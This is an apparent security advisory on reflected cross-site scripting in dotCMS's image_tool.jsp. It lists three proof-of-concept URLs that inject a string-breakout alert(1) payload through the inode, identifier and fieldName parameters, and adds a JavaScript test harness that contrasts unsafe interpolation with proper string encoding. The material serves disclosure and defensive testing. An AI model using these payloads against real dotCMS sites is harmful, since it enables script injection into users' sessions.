dotCMS XSS

  • XSS in html/js/dotcms/dijit/image/image_tool.jsp

http://domain/html/js/dotcms/dijit/image/image_tool.jsp?inode=aaaaaaa%22;alert(1);//

http://domain/html/js/dotcms/dijit/image/image_tool.jsp?inode=&identifier=aaaaaaa%22;alert(1);//&fieldName=

http://domain/html/js/dotcms/dijit/image/image_tool.jsp?inode=&identifier=&fieldName=aaaaaaa%22;alert(1);//
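The value in all three URLs has the shape of a break-out from a double-quoted JavaScript string (`%22` decodes to `"`). The following is an added example, not code from the page or from dotCMS, comparing raw interpolation with JavaScript-string encoding for `inode`, `identifier` and `fieldName`. It assumes the parameter is written into a JS string literal (the JSP source is not shown on the page), and `renderUnsafe`, `renderEncoded`, `jsStringEncode`, `evaluate` and `checkAll` are hypothetical names.

```javascript
// Added example. The page does not show image_tool.jsp's source; this models
// the assumed sink: a request parameter written into a double-quoted
// JavaScript string literal.
const PARAMS = ['inode', 'identifier', 'fieldName'];

// Value from the page's URLs after URL-decoding (%22 is a double quote).
const PAGE_VALUE = decodeURIComponent('aaaaaaa%22;alert(1);//');

// Escape for a JavaScript string-literal context: every UTF-16 code unit
// outside [A-Za-z0-9] becomes \uXXXX, so quotes, backslashes, line
// terminators and "</script>" cannot terminate the literal or the block.
function jsStringEncode(value) {
  let out = '';
  const s = String(value);
  for (let i = 0; i < s.length; i++) {
    const ch = s[i];
    out += /[A-Za-z0-9]/.test(ch)
      ? ch
      : '\\u' + s.charCodeAt(i).toString(16).padStart(4, '0');
  }
  return out;
}

// Hypothetical renderers standing in for the template output.
function renderUnsafe(name, value) {
  return 'var ' + name + ' = "' + value + '";';
}
function renderEncoded(name, value) {
  return 'var ' + name + ' = "' + jsStringEncode(value) + '";';
}

// Evaluate the generated script with a stubbed alert() and report whether the
// input stayed data (alertCalls === 0 and the variable holds the raw value).
function evaluate(name, script) {
  let alertCalls = 0;
  const run = new Function('alert', script + '\nreturn ' + name + ';');
  const value = run(() => { alertCalls += 1; });
  return { alertCalls, value };
}

function checkAll(render) {
  return PARAMS.map((p) => ({ param: p, ...evaluate(p, render(p, PAGE_VALUE)) }));
}

console.log('unsafe :', checkAll(renderUnsafe));
console.log('encoded:', checkAll(renderEncoded));
```

The same harness works as a regression test for a patched template: with correct encoding the variable must hold the raw value and the stub must never be called.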